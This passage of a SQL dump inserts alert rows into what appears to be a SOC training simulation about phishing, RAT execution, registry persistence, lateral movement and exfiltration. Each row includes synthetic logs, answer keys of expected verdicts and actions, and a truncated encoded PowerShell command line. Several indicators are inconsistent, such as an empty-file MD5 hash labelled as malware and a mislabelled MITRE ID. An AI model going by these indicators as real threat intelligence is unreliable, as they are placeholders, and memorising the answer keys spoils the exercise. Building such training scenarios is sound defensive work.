detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"files_transferred\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},{\\\"filename\\\":\\\"financial_data.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}],\\\"user\\\":\\\"jdoe\\\",\\\"encryption\\\":\\\"TLSv1.2\\\",\\\"status\\\":\\\"Success\\\",\\\"alert\\\":\\\"Data Exfiltration Detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1280, 'Initial Access: Phishing Email Detected', 'high', 'Email gateway logs', 'A phishing email was detected attempting to gain initial access by tricking activists into downloading FakeM malware. The email contained a malicious attachment designed to infect the recipient\'s system.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"email_id\":\"1234567890abcdef\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"sender_email\":\"malicious.actor@evilmail.com\",\"recipient_email\":\"activist@nonprofit.org\",\"subject\":\"Urgent: Please Review the Attached Document\",\"attachment_filename\":\"Important_Info.docx\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malware_family\":\"FakeM\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"malicious.actor@evilmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Reported phishing sender email.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with FakeM malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Important_Info.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual attachment for email context.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Email Detected\",\"date\":\"2026-02-24T04:22:04.731Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1281, 'Execution: FakeM Malware Activation', 'high', 'Endpoint detection and response (EDR) logs', 'The FakeM malware was activated on the host machine following the download of a malicious attachment. The malware initiated its payload to infiltrate the system, establishing a foothold.', 'Malware Execution', 'T1204.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:27Z\",\"event_id\":\"987654321\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"user\":\"jdoe\",\"file_name\":\"invoice_2023.pdf.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process_name\":\"FakeM.exe\",\"action\":\"execute\",\"status\":\"success\",\"event_description\":\"The process FakeM.exe was executed by user jdoe on host 192.168.1.5.\",\"os_version\":\"Windows 10\",\"edr_alert_id\":\"edr-123456\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for FakeM malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host where FakeM malware was executed.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Suspicious file masquerading as a PDF document.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the FakeM malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1282, 'Persistence: Registry Modification Detected', 'medium', 'Registry change monitoring tool', 'To maintain a persistent presence, the malware alters the system registry, ensuring it remains active even after system restarts. A registry modification was detected that suggests a persistence mechanism is being employed.', 'Persistence Mechanism', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.100\",\"user\":\"jdoe\",\"registry_key\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value\":\"MaliciousApp\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\MaliciousApp.exe\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"action\":\"Registry Key Modified\",\"tool\":\"RegMonitor v2.3\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelService\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"ActiveDirectory\",\"verdict\":\"clean\",\"details\":\"Valid user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"MaliciousApp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileAnalysisService\",\"verdict\":\"malicious\",\"details\":\"File involved in persistence mechanism.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"MaliciousApp\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\MaliciousApp.exe\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"Registry Key Modified\\\",\\\"tool\\\":\\\"RegMonitor v2.3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1283, 'Lateral Movement: Unauthorized Network Access', 'high', 'Network traffic analysis', 'The network traffic analysis detected unauthorized access attempts from an internal workstation to multiple devices within the activist network. The source IP of the attack is identified as 192.168.1.45, with traffic directed towards 10.0.0.22. The attacker appears to be leveraging credentials for user \'jdoe\' and executing suspicious binaries identified as \'explore.exe\', which is linked to known lateral movement tactics.', 'Network Intrusion', 'T1080: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:23Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.22\",\"user\":\"jdoe\",\"executed_file\":\"explore.exe\",\"file_hash\":\"3b3f2e8f7c1d2f3f4a5b6c7d8e9f0a1b\",\"network_protocol\":\"SMB\",\"action\":\"access_attempt\",\"outcome\":\"success\",\"description\":\"Suspicious lateral movement attempt detected from compromised workstation.\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of a compromised workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Target internal device.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_db\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"explore.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Known tool used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3b3f2e8f7c1d2f3f4a5b6c7d8e9f0a1b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a malicious file used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1284, 'Exfiltration: Data Transfer to External Server', 'high', 'Firewall and SIEM alerts', 'The final stage of the operation involves the exfiltration of critical information, stealthily transferring data to external servers under the attackers\' control. An observed data transfer was detected from an internal host to a suspicious external IP address.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:48:05Z\",\"source_ip\":\"10.25.34.5\",\"destination_ip\":\"203.0.113.45\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TCP\",\"action\":\"ALLOW\",\"file_name\":\"exported_data_20231012.zip\",\"file_hash\":\"a6f5d3f1c76e5b9b0d2f3e5c4d8a9b2c\",\"username\":\"jdoe\",\"event_id\":\"FW123456\",\"alert\":\"Data exfiltration detected from 10.25.34.5 to 203.0.113.45\"}', '2026-02-24 03:14:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.25.34.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exported_data_20231012.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual data export activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a6f5d3f1c76e5b9b0d2f3e5c4d8a9b2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"No known malware but unusual hash activity\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1285, 'Spear Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'Groundbait initiated their campaign with targeted spear-phishing emails sent to activists, embedding malicious attachments designed to breach personal accounts. The email was identified with a suspicious attachment and a known malicious IP address.', 'Phishing', 'T1566.002', 1, 'investigating', 209, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"email_id\":\"b3f2e0c9-4dff-4f2b-8451-2d54e3f9e1d4\",\"sender\":\"noreply@compromised.org\",\"recipient\":\"activist123@example.com\",\"subject\":\"Urgent Action Required\",\"attachment\":\"invoice_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"malicious_indicator\":true}', '2026-02-24 03:14:42', '2026-02-27 04:05:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@compromised.org\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Intel\",\"verdict\":\"malicious\",\"details\":\"File contains macro malware targeting account credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to phishing infrastructure.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Campaign Detected\",\"date\":\"2026-02-24T04:22:04.745Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1286, 'Remote Access Trojan Execution', 'high', 'Endpoint Detection and Response (EDR) Logs', 'A Remote Access Trojan (RAT) has been executed on the compromised system following a phishing attack. This RAT, identified as \'Groundbait\', is used by the attacker to maintain access and initiate data gathering activities.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:25:43Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.10\",\"process_name\":\"svchost.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"parent_process\":\"explorer.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"user\":\"john.doe\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"groundbait_loader.dll\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-02-24 03:14:42', '2026-02-26 07:44:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Low detection rate but known to be used in RAT delivery.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Identified as Groundbait RAT loader.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"groundbait_loader.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Loader component of Groundbait RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 